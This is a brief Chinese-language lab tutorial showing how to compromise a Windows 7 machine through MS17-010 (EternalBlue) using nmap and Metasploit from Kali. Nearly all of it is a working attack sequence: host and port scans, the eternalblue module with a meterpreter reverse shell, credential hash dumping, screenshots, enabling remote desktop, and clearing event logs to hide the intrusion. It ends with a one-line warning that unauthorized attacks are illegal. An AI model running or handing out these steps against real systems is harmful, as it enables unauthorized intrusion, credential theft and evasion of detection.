-----漏洞入侵 -----MS17-010 永恒之蓝 --勒索病毒 ----利用MSF攻击框架 ----用到meterPeter 渗透工具渗透
实验环境 : 一台KALI 一台win 7 ----MS17-010 利用445端口实行入侵 只有防火墙关闭才会成功
操作步骤
1,扫描主机开放端口情况
nmap -sP 192.168.31.1-255 扫描在线主机 nmap -sS 192.168.31.109 扫描端口开放情况 nmap -O 192.168.31.109 扫描操作系统2,扫描到端口开放,扫描到win7系统,利用漏洞开始攻击,
root@kali:~# msfconsole //开启运行MSF攻击框架 msf > search dos //查找KALI漏洞库 msf > search ms17-010 //查找MS17-010漏洞 ,并复制存放路径 msf > use exploit/windows/smb/ms17_010_eternalblue //应用漏洞 set payload windows/x64/meterpreter/reverse_tcp //设置反弹端口,让远程主机主动的连接此端口 set rhost 192.168.31.153 //设置渗透的目标主机IP set lhost 192.168.31.109 //设置本地的主机IP exploit //利用 meterpreter > pwd //进入到渗透视图 (进入了目标WIN7系统) C:\Windows\system32 meterpreter3,进入到win7系统执行一些恶意命令,开启远程实施图形化登陆,
meterpreter > mkdir jiayou //创建文件夹 meterpreter > hashdump //破解密码 meterpreter > screenshot //屏幕截图 meterpreter > run getgui -e //启动远程程序 新建终端 :rdesktop - u tedu -p tedu 192.168.31.109:3389 //远程登陆 C:\Windows\system32>exit meterpreter > clearev //清除日志友情提示: 真实环境中,请勿利用漏洞实施攻击,俗话说,kali玩的好,监狱进的早 任何未经授权的渗透,攻击测试,都是违法行为。
